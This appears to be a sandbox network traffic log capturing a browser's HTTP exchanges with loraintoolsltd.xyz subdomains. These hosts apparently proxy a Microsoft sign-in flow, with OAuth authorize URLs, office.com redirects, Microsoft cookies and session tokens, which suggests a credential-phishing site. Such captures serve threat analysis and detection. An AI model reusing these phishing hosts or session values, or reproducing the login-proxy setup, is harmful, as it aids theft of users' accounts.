2025-01-23 23:03:42 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-23 23:03:42 UTC	3	IN	Data Raw: 30 0d 0a Data Ascii: 0
2025-01-23 23:03:42 UTC	2	IN	Data Raw: 0d 0a Data Ascii:

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:42 UTC	837	OUT	GET / HTTP/1.1 Host: login.loraintoolsltd.xyz Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://login.loraintoolsltd.xyz/FgJIoRDm Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: b747-6a6f=44d01aaa0d40cdbad7418ddb99b7cff6486e9817f0ffac5caa68a31026a54cb8; x-ms-gateway-slice=estsfd
2025-01-23 23:03:42 UTC	20	IN	HTTP/1.1 302 Found
2025-01-23 23:03:42 UTC	35	IN	Data Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 0d 0a Data Ascii: Cache-Control: no-store, no-cache
2025-01-23 23:03:42 UTC	19	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a Data Ascii: Connection: close
2025-01-23 23:03:42 UTC	40	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a Data Ascii: Content-Type: text/html; charset=utf-8
2025-01-23 23:03:42 UTC	37	IN	Data Raw: 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4a 61 6e 20 32 30 32 35 20 32 33 3a 30 33 3a 34 32 20 47 4d 54 0d 0a Data Ascii: Date: Thu, 23 Jan 2025 23:03:42 GMT
2025-01-23 23:03:42 UTC	13	IN	Data Raw: 45 78 70 69 72 65 73 3a 20 2d 31 0d 0a Data Ascii: Expires: -1
2025-01-23 23:03:42 UTC	48	IN	Data Raw: 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 72 61 69 6e 74 6f 6f 6c 73 6c 74 64 2e 78 79 7a 2f 6c 6f 67 69 6e 0d 0a Data Ascii: Location: https://www.loraintoolsltd.xyz/login
2025-01-23 23:03:42 UTC	101	IN	Data Raw: 4e 65 6c 3a 20 7b 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 73 22 2c 22 6d 61 78 5f 61 67 65 22 3a 38 36 34 30 30 2c 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 30 31 2c 22 66 61 69 6c 75 72 65 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 7d 0d 0a Data Ascii: Nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
2025-01-23 23:03:42 UTC	41	IN	Data Raw: 50 33 70 3a 20 43 50 3d 22 44 53 50 20 43 55 52 20 4f 54 50 69 20 49 4e 44 20 4f 54 52 69 20 4f 4e 4c 20 46 49 4e 22 0d 0a Data Ascii: P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
2025-01-23 23:03:42 UTC	18	IN	Data Raw: 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a Data Ascii: Pragma: no-cache
2025-01-23 23:03:42 UTC	50	IN	Data Raw: 52 65 66 65 72 72 65 72 2d 50 6f 6c 69 63 79 3a 20 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a Data Ascii: Referrer-Policy: strict-origin-when-cross-origin

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:43 UTC	803	OUT	GET /login HTTP/1.1 Host: www.loraintoolsltd.xyz Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://login.loraintoolsltd.xyz/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: b747-6a6f=44d01aaa0d40cdbad7418ddb99b7cff6486e9817f0ffac5caa68a31026a54cb8
2025-01-23 23:03:43 UTC	20	IN	HTTP/1.1 302 Found
2025-01-23 23:03:43 UTC	19	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a Data Ascii: Connection: close
2025-01-23 23:03:43 UTC	24	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 67 7a 69 70 0d 0a Data Ascii: Content-Encoding: gzip
2025-01-23 23:03:43 UTC	40	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a Data Ascii: Content-Type: text/html; charset=utf-8
2025-01-23 23:03:43 UTC	37	IN	Data Raw: 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4a 61 6e 20 32 30 32 35 20 32 33 3a 30 33 3a 34 32 20 47 4d 54 0d 0a Data Ascii: Date: Thu, 23 Jan 2025 23:03:42 GMT
2025-01-23 23:03:43 UTC	837	IN	Data Raw: 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 6c 6f 72 61 69 6e 74 6f 6f 6c 73 6c 74 64 2e 78 79 7a 2f 63 6f 6d 6d 6f 6e 2f 6f 61 75 74 68 32 2f 76 32 2e 30 2f 61 75 74 68 6f 72 69 7a 65 3f 63 6c 69 65 6e 74 5f 69 64 3d 34 37 36 35 34 34 35 62 2d 33 32 63 36 2d 34 39 62 30 2d 38 33 65 36 2d 31 64 39 33 37 36 35 32 37 36 63 61 26 72 65 64 69 72 65 63 74 5f 75 72 69 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 6f 66 66 69 63 65 2e 63 6f 6d 25 32 46 6c 61 6e 64 69 6e 67 76 32 26 72 65 73 70 6f 6e 73 65 5f 74 79 70 65 3d 63 6f 64 65 25 32 30 69 64 5f 74 6f 6b 65 6e 26 73 63 6f 70 65 3d 6f 70 65 6e 69 64 25 32 30 70 72 6f 66 69 6c 65 25 32 30 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 6f 66 66 69 63 65 2e 63 6f Data Ascii: Location: https://login.loraintoolsltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.co
2025-01-23 23:03:43 UTC	50	IN	Data Raw: 52 65 66 65 72 72 65 72 2d 50 6f 6c 69 63 79 3a 20 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a Data Ascii: Referrer-Policy: strict-origin-when-cross-origin
2025-01-23 23:03:43 UTC	25	IN	Data Raw: 52 65 71 75 65 73 74 2d 43 6f 6e 74 65 78 74 3a 20 61 70 70 49 64 3d 0d 0a Data Ascii: Request-Context: appId=
2025-01-23 23:03:43 UTC	114	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4f 48 2e 44 43 41 66 66 69 6e 69 74 79 3d 4f 48 2d 77 75 73 3b 20 50 61 74 68 3d 2f 3b 20 45 78 70 69 72 65 73 3d 46 72 69 2c 20 32 34 20 4a 61 6e 20 32 30 32 35 20 30 37 3a 30 33 3a 34 33 20 47 4d 54 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a Data Ascii: Set-Cookie: OH.DCAffinity=OH-wus; Path=/; Expires=Fri, 24 Jan 2025 07:03:43 GMT; HttpOnly; Secure; SameSite=None
2025-01-23 23:03:43 UTC	138	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4f 48 2e 46 4c 49 44 3d 37 30 31 37 63 62 36 64 2d 64 33 30 63 2d 34 38 38 66 2d 61 35 37 32 2d 37 39 32 66 37 31 64 66 66 38 31 61 3b 20 50 61 74 68 3d 2f 3b 20 45 78 70 69 72 65 73 3d 46 72 69 2c 20 32 33 20 4a 61 6e 20 32 30 32 36 20 32 33 3a 30 33 3a 34 33 20 47 4d 54 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a Data Ascii: Set-Cookie: OH.FLID=7017cb6d-d30c-488f-a572-792f71dff81a; Path=/; Expires=Fri, 23 Jan 2026 23:03:43 GMT; HttpOnly; Secure; SameSite=None
2025-01-23 23:03:43 UTC	68	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4f 48 2e 53 49 44 3d 3b 20 50 61 74 68 3d 2f 3b 20 45 78 70 69 72 65 73 3d 54 68 75 2c 20 30 31 20 4a 61 6e 20 31 39 37 30 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a Data Ascii: Set-Cookie: OH.SID=; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:44 UTC	1888	OUT	GET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx&ui_locales=en-US&mkt=en-US&client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb&state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0 HTTP/1.1 Host: login.loraintoolsltd.xyz Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://login.loraintoolsltd.xyz/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: b747-6a6f=44d01aaa0d40cdbad7418ddb99b7cff6486e9817f0ffac5caa68a31026a54cb8; x-ms-gateway-slice=estsfd; fpc=AiumHXxYOuNFj4oY4VmBUHk; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE5nFMfJ3IbWwY4V6mtsvc6l5thtnfzcAgl7FM_XwCAgWPEfDbX-5MS-irnFE3T-M4xsRwWq5kMQSz_hUC2svPV5ogubGkg2XzkzbQSjdV88QzSy_QmGBo2UuJ4jhLnlndZMdjY73y_BIiO8K_wDSYNeMxIVFMdN14V9J_ntdAdNMgAA; stsservicecookie=estsfd
2025-01-23 23:03:44 UTC	17	IN	HTTP/1.1 200 OK
2025-01-23 23:03:44 UTC	35	IN	Data Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 0d 0a Data Ascii: Cache-Control: no-store, no-cache
2025-01-23 23:03:44 UTC	19	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a Data Ascii: Connection: close
2025-01-23 23:03:44 UTC	40	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a Data Ascii: Content-Type: text/html; charset=utf-8
2025-01-23 23:03:44 UTC	37	IN	Data Raw: 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4a 61 6e 20 32 30 32 35 20 32 33 3a 30 33 3a 34 34 20 47 4d 54 0d 0a Data Ascii: Date: Thu, 23 Jan 2025 23:03:44 GMT
2025-01-23 23:03:44 UTC	13	IN	Data Raw: 45 78 70 69 72 65 73 3a 20 2d 31 0d 0a Data Ascii: Expires: -1
2025-01-23 23:03:44 UTC	101	IN	Data Raw: 4e 65 6c 3a 20 7b 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 73 22 2c 22 6d 61 78 5f 61 67 65 22 3a 38 36 34 30 30 2c 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 30 31 2c 22 66 61 69 6c 75 72 65 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 7d 0d 0a Data Ascii: Nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
2025-01-23 23:03:44 UTC	41	IN	Data Raw: 50 33 70 3a 20 43 50 3d 22 44 53 50 20 43 55 52 20 4f 54 50 69 20 49 4e 44 20 4f 54 52 69 20 4f 4e 4c 20 46 49 4e 22 0d 0a Data Ascii: P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
2025-01-23 23:03:44 UTC	18	IN	Data Raw: 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a Data Ascii: Pragma: no-cache
2025-01-23 23:03:44 UTC	50	IN	Data Raw: 52 65 66 65 72 72 65 72 2d 50 6f 6c 69 63 79 3a 20 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a Data Ascii: Referrer-Policy: strict-origin-when-cross-origin
2025-01-23 23:03:44 UTC	150	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 67 72 6f 75 70 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 73 22 2c 22 6d 61 78 5f 61 67 65 22 3a 38 36 34 30 30 2c 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 69 64 65 6e 74 69 74 79 2e 6e 65 6c 2e 6d 65 61 73 75 72 65 2e 6f 66 66 69 63 65 2e 6e 65 74 2f 61 70 69 2f 72 65 70 6f 72 74 3f 63 61 74 49 64 3d 47 57 2b 65 73 74 73 66 64 2b 77 73 74 22 7d 5d 7d 0d 0a Data Ascii: Report-To: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+wst"}]}

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:46 UTC	2923	OUT	GET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx&ui_locales=en-US&mkt=en-US&client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb&state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=true HTTP/1.1 Host: login.loraintoolsltd.xyz Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://login.loraintoolsltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx&ui_locales=en-US&mkt=en-US&client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb&state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: b747-6a6f=44d01aaa0d40cdbad7418ddb99b7cff6486e9817f0ffac5caa68a31026a54cb8; x-ms-gateway-slice=estsfd; fpc=AiumHXxYOuNFj4oY4VmBUHk; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE5nFMfJ3IbWwY4V6mtsvc6l5thtnfzcAgl7FM_XwCAgWPEfDbX-5MS-irnFE3T-M4xsRwWq5kMQSz_hUC2svPV5ogubGkg2XzkzbQSjdV88QzSy_QmGBo2UuJ4jhLnlndZMdjY73y_BIiO8K_wDSYNeMxIVFMdN14V9J_ntdAdNMgAA; stsservicecookie=estsfd; esctx-kz8rlQGIpI=AQABCQEAAABVrSpeuWamRam2jAF1XRQEzRIUEQeY1D7eLy0UQxpcxWfgOYW4VTYJZCD75yzqGkapbvfuaYKkpTy2mv2vw2KguJ9zQ-zHquZTfpM33qLZDvn6Nzt9C_xs0-b38fDlKISNFCmoKrpmb57W8yR58RcmoEtDHD2TLqL2agxSHYKE5iAA; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1
2025-01-23 23:03:46 UTC	17	IN	HTTP/1.1 200 OK
2025-01-23 23:03:46 UTC	35	IN	Data Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 0d 0a Data Ascii: Cache-Control: no-store, no-cache
2025-01-23 23:03:46 UTC	19	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a Data Ascii: Connection: close
2025-01-23 23:03:46 UTC	40	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a Data Ascii: Content-Type: text/html; charset=utf-8
2025-01-23 23:03:46 UTC	37	IN	Data Raw: 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4a 61 6e 20 32 30 32 35 20 32 33 3a 30 33 3a 34 36 20 47 4d 54 0d 0a Data Ascii: Date: Thu, 23 Jan 2025 23:03:46 GMT
2025-01-23 23:03:46 UTC	13	IN	Data Raw: 45 78 70 69 72 65 73 3a 20 2d 31 0d 0a Data Ascii: Expires: -1
2025-01-23 23:03:46 UTC	158	IN	Data Raw: 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 3e 3b 20 72 65 6c 3d 70 72 65 63 6f 6e 6e 65 63 74 3b 20 63 72 6f 73 73 6f 72 69 67 69 6e 2c 3c 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 3e 3b 20 72 65 6c 3d 64 6e 73 2d 70 72 65 66 65 74 63 68 2c 3c 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 66 74 61 75 74 68 2e 6e 65 74 3e 3b 20 72 65 6c 3d 64 6e 73 2d 70 72 65 66 65 74 63 68 0d 0a Data Ascii: Link: <https://aadcdn.msauth.net>; rel=preconnect; crossorigin,<https://aadcdn.msauth.net>; rel=dns-prefetch,<https://aadcdn.msftauth.net>; rel=dns-prefetch
2025-01-23 23:03:46 UTC	101	IN	Data Raw: 4e 65 6c 3a 20 7b 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 73 22 2c 22 6d 61 78 5f 61 67 65 22 3a 38 36 34 30 30 2c 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 30 31 2c 22 66 61 69 6c 75 72 65 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 7d 0d 0a Data Ascii: Nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
2025-01-23 23:03:46 UTC	41	IN	Data Raw: 50 33 70 3a 20 43 50 3d 22 44 53 50 20 43 55 52 20 4f 54 50 69 20 49 4e 44 20 4f 54 52 69 20 4f 4e 4c 20 46 49 4e 22 0d 0a Data Ascii: P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
2025-01-23 23:03:46 UTC	18	IN	Data Raw: 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a Data Ascii: Pragma: no-cache
2025-01-23 23:03:46 UTC	50	IN	Data Raw: 52 65 66 65 72 72 65 72 2d 50 6f 6c 69 63 79 3a 20 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a Data Ascii: Referrer-Policy: strict-origin-when-cross-origin

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:47 UTC	774	OUT	GET /Me.htm?v=3 HTTP/1.1 Host: live.loraintoolsltd.xyz Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Purpose: prefetch Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://login.loraintoolsltd.xyz/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: b747-6a6f=44d01aaa0d40cdbad7418ddb99b7cff6486e9817f0ffac5caa68a31026a54cb8
2025-01-23 23:03:47 UTC	17	IN	HTTP/1.1 200 OK
2025-01-23 23:03:47 UTC	34	IN	Data Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 30 0d 0a Data Ascii: Cache-Control: max-age=315360000
2025-01-23 23:03:47 UTC	19	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a Data Ascii: Connection: close
2025-01-23 23:03:47 UTC	40	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a Data Ascii: Content-Type: text/html; charset=utf-8
2025-01-23 23:03:47 UTC	37	IN	Data Raw: 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4a 61 6e 20 32 30 32 35 20 32 33 3a 30 33 3a 34 36 20 47 4d 54 0d 0a Data Ascii: Date: Thu, 23 Jan 2025 23:03:46 GMT
2025-01-23 23:03:47 UTC	40	IN	Data Raw: 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 31 20 4a 61 6e 20 32 30 33 35 20 32 33 3a 30 33 3a 34 37 20 47 4d 54 0d 0a Data Ascii: Expires: Sun, 21 Jan 2035 23:03:47 GMT
2025-01-23 23:03:47 UTC	41	IN	Data Raw: 50 33 70 3a 20 43 50 3d 22 44 53 50 20 43 55 52 20 4f 54 50 69 20 49 4e 44 20 4f 54 52 69 20 4f 4e 4c 20 46 49 4e 22 0d 0a Data Ascii: P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
2025-01-23 23:03:47 UTC	43	IN	Data Raw: 50 70 73 65 72 76 65 72 3a 20 50 50 56 3a 20 33 30 20 48 3a 20 50 48 31 50 45 50 46 30 30 30 31 38 42 46 45 20 56 3a 20 30 0d 0a Data Ascii: Ppserver: PPV: 30 H: PH1PEPF00018BFE V: 0
2025-01-23 23:03:47 UTC	50	IN	Data Raw: 52 65 66 65 72 72 65 72 2d 50 6f 6c 69 63 79 3a 20 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a Data Ascii: Referrer-Policy: strict-origin-when-cross-origin
2025-01-23 23:03:47 UTC	124	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 75 61 69 64 3d 32 64 37 61 37 36 65 62 62 66 35 38 34 37 36 35 38 33 30 32 31 30 33 38 34 61 66 64 66 65 33 30 3b 20 50 61 74 68 3d 2f 3b 20 44 6f 6d 61 69 6e 3d 6c 69 76 65 2e 6c 6f 72 61 69 6e 74 6f 6f 6c 73 6c 74 64 2e 78 79 7a 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a Data Ascii: Set-Cookie: uaid=2d7a76ebbf584765830210384afdfe30; Path=/; Domain=live.loraintoolsltd.xyz; HttpOnly; Secure; SameSite=None
2025-01-23 23:03:47 UTC	118	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4d 53 50 52 65 71 75 3d 69 64 3d 4e 26 6c 74 3d 31 37 33 37 36 37 33 34 32 37 26 63 6f 3d 31 3b 20 50 61 74 68 3d 2f 3b 20 44 6f 6d 61 69 6e 3d 6c 69 76 65 2e 6c 6f 72 61 69 6e 74 6f 6f 6c 73 6c 74 64 2e 78 79 7a 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a Data Ascii: Set-Cookie: MSPRequ=id=N&lt=1737673427&co=1; Path=/; Domain=live.loraintoolsltd.xyz; HttpOnly; Secure; SameSite=None

